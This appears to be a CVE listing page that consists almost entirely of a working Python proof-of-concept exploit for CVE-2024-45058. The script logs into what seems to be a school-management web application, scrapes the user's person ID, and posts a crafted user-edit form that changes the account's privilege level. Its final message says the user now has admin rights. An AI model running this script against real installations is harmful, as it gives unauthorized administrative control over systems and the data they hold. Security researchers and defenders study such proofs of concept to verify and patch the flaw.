CVE-2024-45058 – CVE Helper

README.md
Rendering markdown...
POC / CVE-2024-45058.py PY
⬇ Raw GitHub ✕ Close
from bs4 import BeautifulSoup
import argparse
import requests



class Exploit:
    def __init__(self, args):
        self.__TARGET = args.target
        self.__USER = args.username
        self.__PASS = args.password
        self.__NIVEL_USUARIO_ID = args.id
        self.__session = requests.Session()
        self.__login()
        self.__REF_PESSOA_ID = self.__fetch_ref_pessoa()

    def __fetch_ref_pessoa(self):
        print("[*] Fetching ref_pessoa ID...", end="\r")
        _soup = BeautifulSoup(self.__session.get(f"{self.__TARGET}/intranet/educar_usuario_lst.php?busca=S&matricula={self.__USER}").text, "html.parser")
        _td = _soup.find("form", {"id": "form_resultado"}).find("table", {"class": "tablelistagem"}).find_all("tr")[2].find_all("td")[0]
        ref_pessoa_id = _td.find("a")["href"].split("=")[-1]
        print(f"[x] Fetching ref_pessoa ID ==> {ref_pessoa_id}")
        return ref_pessoa_id

    def __login(self):
        print("[*] Logging in...")
        data = {"login": self.__USER, "password": self.__PASS}
        self.__session.post(f"{self.__TARGET}/login", data=data)

    def main(self):
        print(f"[*] Trying to change the nivel_usuario_ to {self.__NIVEL_USUARIO_ID}")
        data = {
            'tipoacao': 'Editar', 'nome': '', 'tempo_expira_senha': '0', '_senha': '', 'email': '',
            'data_expiracao': '', 'ativo': '1', 'ref_cod_funcionario_vinculo': '1',
            'ref_cod_tipo_usuario': '1', 'ref_cod_instituicao': '1', 'matricula_interna': '',
            'nivel_usuario_': self.__NIVEL_USUARIO_ID, 'ref_pessoa': self.__REF_PESSOA_ID, 'matricula': self.__USER,
        }
        self.__session.post(f"{self.__TARGET}/intranet/educar_usuario_cad.php", data=data)
        print(f"[!] The user should have admin privileges now!")



if __name__ == "__main__":
    parser = argparse.ArgumentParser(description = "CVE-2024-45058 exploit")
    parser.add_argument("-t", "--target", help="Vulnerable target", required=True)
    parser.add_argument("-u", "--username", help="Account username", required=True)
    parser.add_argument("-p", "--password", help="Account password", required=True)
    parser.add_argument("-i", "--id", help="nivel_usuario_ ID to be set", required=True)
    args = parser.parse_args()
    Exploit(args).main()